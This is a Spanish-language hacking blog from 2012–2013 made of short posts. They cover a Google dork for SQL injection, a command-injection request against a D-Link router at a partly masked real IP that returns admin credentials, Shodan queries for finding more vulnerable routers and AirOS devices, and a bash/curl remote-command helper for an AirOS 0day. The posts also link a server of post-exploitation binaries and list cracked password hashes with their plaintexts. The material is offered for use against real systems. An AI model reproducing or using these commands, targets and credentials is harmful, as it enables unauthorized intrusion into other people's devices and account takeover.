miércoles, 20 de febrero de 2013

Isaken Advertising Media Ltd SQL Injection

DORK: inurl:"dog.php?cat=" "Powered By Isaken Advertising Media Ltd"

 http://cxsecurity.com/issue/WLB-2013020142


Publicado por en No hay comentarios:

jueves, 14 de febrero de 2013

routers D-Link DIR-300 y DIR-600


en los routers D-Link DIR-300 y DIR-600

22:34@coyote:~/Escritorio$ sudo curl --data "cmd=cat /var/passwd" http://188.11X.224.XX/command.php
"admin" "mortadela" "0"

como encontrar routers vuln????

http://www.shodanhq.com/search?q=Server%3A+Linux%2C+HTTP%2F1.1%2C+DIR-300
http://www.shodanhq.com/search?q=Server%3A+Linux%2C+HTTP%2F1.1%2C+DIR-600




fuentes:
http://www.h-online.com/security/news/item/Security-alert-for-D-Link-routers-1798804.html
http://threatpost.com/en_us/blogs/researcher-warns-d-link-router-vulnerabilities-020713
http://www.s3cur1ty.de/m1adv2013-003

Publicado por en No hay comentarios:

sábado, 1 de diciembre de 2012

algunos hash crackeados :-9


2e07f7860badf0d07252c22a31fb03c2:iiris
827ccb0eea8a706c4c34a16891f84e7b:12345
1f36c15d6a3d18d52e8d493bc8187cb9:1985
6e854442cd2a940c9e95941dce4ad598:nobody
cf1cda4e6a61d6d6f3488d83e80e133d:dom1807
8c1f1cd7e4872011e5598a2bb9d8218f:elenasmolkova
9aed3935a05586aeb0b95bda09b8c9ed:deluxesamara10
b092c4b50aedee92de7d76eefbd6e1bc:svetlana10
e177164a897f0b8e447157935302986f:marina10
.
.
.fda592bc3eba16dfcb858dabff8767ff3a12d6c8:93637316
6e1a438cfe5a6c9e2165665f8c2258849ccc43f0:anthony
40fdaeddab9567ad24bb9610ca88930ae1b2d7cc:sonia
12fd5311017d4b8faf7abc6d7fa13d182f519a13:tiago
250e77f12a5ab6972a0895d290c4792f0a326ea8:banana
7c4a8d09ca3762af61e59520943dc26494f8941b:123456
31fb9f38feb65b1accc25e0538d508d715d951bb:1901
.
.
.

$P$BSoEJlvUeXQyg4qcaxUiWGaxOM5z8n1:111111
$P$BpQJpfGl8dEm.neUHzYsuXw06dr56q0:mother
$P$B5D2wIt9Q61eJFsQtNEb9CwkAFrYsQ.:122333
$P$BSRHKuSiB5JFsgl7EYG/YMrASJZgi81:black
$P$B00stfoYggMMzD0kN/UJkoSUXcLF.g0:iloveyou
$P$B8SQq1HJD9TNjm/loMQYJeAj7AE6Sj0:diamond
$P$B91RnAmZHNO/lO4ya2M9xfuJsJpp2J/:iloveyou
$P$BgDyA6ygSPn7/mDPm5SSg3qqcTolIV/:cocacola

http://pastebin.com/EB9X948B

Publicado por en No hay comentarios:

lunes, 22 de octubre de 2012

video curso de programacion en python



  • Que es Python?
  • Historia de Python
  • Fundamentos de Programación
  • Fundamentos de Lógica
  • Estructura de Datos y Algoritmos
  • Metodología para Solucionar un Problema
  • Algoritmos
  • Variables, Constantes y Operadores
  • Variables, Constantes y Operadores 2
  • Estructuras Básicas 1
  • Estructuras Básicas 2
  • Técnicas para Representar Algoritmos 1
  • Técnicas para Representar Algoritmos 2
  • Técnicas para Representar Algoritmos 3
  • Técnicas para Representar Algoritmos 4
  • La Tecnología 1
  • La Tecnología 2
  • La Tecnología 3
  • La Tecnología 4
  • Metodología, Tecnología y Técnicas para Solucionar un Problema
  • Metodología, Tecnología y Técnicas para Solucionar un Problema 1A
  • Metodología, Tecnología y Técnicas para Solucionar un Problema 1B
  • Metodología, Tecnología y Técnicas para Solucionar un Problema 2A
  • Metodología, Tecnología y Técnicas para Solucionar un Problema 2B
  • Metodología, Tecnología y Técnicas para Solucionar un Problema 3A
  • Metodología, Tecnología y Técnicas para Solucionar un Problema 3B
  • Decisiones 1
  • Decisiones 2
  • Decisiones 3
  • Ciclos 1
  • Ciclos 2
  • Ciclos 3
  • Ciclos 4
  • Ciclos 5
  • Ciclos 6
  • Ciclos 7
  • Ciclos 8
  • Ciclos 9
  • Ciclos 10
  • Ciclos 11
  • Ciclos 12
  • Ciclos 13
  • Ciclos 14
  • Arreglos 1
  • Arreglos 2
  • Arreglos 3
  • Arreglos 4
  • Arreglos 5
  • Arreglos 6
  • Arreglos 7
  • Arreglos 8
  • Arreglos 9
  • Arreglos 10
  • Arreglos 11
  • Matrices y Funciones

DOCUMENTOS

  • Programando con Stackless Python
  • Python y PyQT
  • Kspread y Python nos ofrecen una forma simple de realizar facturas automáticas
  • Exploración del Lenguaje Script Boo
  • La revolución se acerca al mundo de Python
  • No solo las Tortugas Pintan
  • Inseguridades
  • Expansión de Gedit, el pequeño gran editor
  • Gráficos que Ayudan a Pensar
  • Crea un Albun de Imagenes
  • Generación de Informes Profesionales desde Python
  • Representacion Grafica 2D
  • La nueva Tecnologia Web
  • La libreria Curses en Python
  • Visualizacion 3D con VTK
  • WepPy un framework muy ligero
  • Crear aplicaciones en red con Twisted
  • Python: Potencia y sencillez multiplataforma
  • Wiki Wiki Python
  • Extendiendo Xchat
  • PyUno: Explora todo el potencial Open Office
  • Imagenes Satelite en Python
  • Enlazando Python con la realidad
  • Pensando en Python (y IV): XML, Java e IA
  • El Poder de Gnuplot y las expresiones regulares
  • Aprovecha y usa cualquier librerías de Java
  • La R.A.E. y Python raudas al rescate
  • Mayordomo Python
  • Cuando los Mundos Chocan
  • Sudokus
  • Meta-Python
  • Pensando en Python (III): 3 en raya en la web
  • Mundos 3D con Python y Panda 3D
  • IronPython
  • Nunca el 3D fue tan sencillo como con Python y Blender
  • Baile Perfecto
  • Plugings 2.0
  • Python y la Web
  • Filtros Bayesianos en Python
  • Inteligencia Artificial y Python
  • Trucos Python
  • DBUS y la Serpiente
  • Comparativa de IDES para Python
  • Introducción de Python en Linux
  • Máxima Seguridad
  • Librerías wxWindows
  • Zona Plone
  • La Serpiente Muda su Piel
  • Regularidades

Recuerdo, que también incluye software libre y códigos ya hechos de ejemplos.

Descargar: http://vmware.vts2006.com/ISOS/Aprender%20Python.iso

fuente: http://www.queseguridad.com/2012/09/video-curso-de-programacion-en-python.html
Publicado por en No hay comentarios:

sábado, 13 de octubre de 2012

Web Application Penetration Testing con Google Chrome

Pequeña lista de extensiones interesantes y útiles que pueden ayudar a muchos de nosotros cuando estemos haciendo una prueba de penetración.
xss rays
google hack data base
hpp finder
form fuzzer
...

Publicado por en No hay comentarios:

viernes, 12 de octubre de 2012

Explotación, postexplotación y potencial del 0day en AirOS

Recordais esta noticia:
http://arealinux.blogspot.com.es/2011/12/0day-en-airos-acceso-como-root.html

....
Tenemos un pequeño directorio con un puñado de binarios ya crosscompilados y listos para AirOS disponible en:

    http://5.175.223.63/bin/

Y empaquetado en .tar:

    http://5.175.223.63/bin.tar

Incluso podríamos incluir algunos más como ngircd (Un pequeño servidor IRC), o lo que se nos ocurra.

A continuación, vamos a pasar a automatizar estas tareas. Obviamente no puedo publicar más que un par de lineas para deja la imaginación flotar con bash y curl:

runcmd() { curl -L -H 'Expect: ' -F 'action=cli' -F "exec={ $SYS2$@; } 2>&1" $host/admin.cgi/lol.css 2>/dev/null | grep 'Execute!'  -A 99999 | tail -n +5 | tac | tail -n +7 | tac; }
....
fuente: http://www.hackplayers.com/2012/10/explotacion-postexplotacion-0day-en-AirOS.html#more
vuln: http://www.shodanhq.com/search?q=airos
1º noticia: http://seclists.org/fulldisclosure/2011/Dec/419 
Publicado por en No hay comentarios:

lunes, 8 de octubre de 2012

http://exiv.me/_test_pluton/_php_my_ads-exiv_iis/index.php?&db=exiv_web&phpMyAdmin=6dnIjsqXEuYlCP5Z4mjJ0yKzha4
Publicado por en No hay comentarios:
Suscribirse a: Entradas (Atom)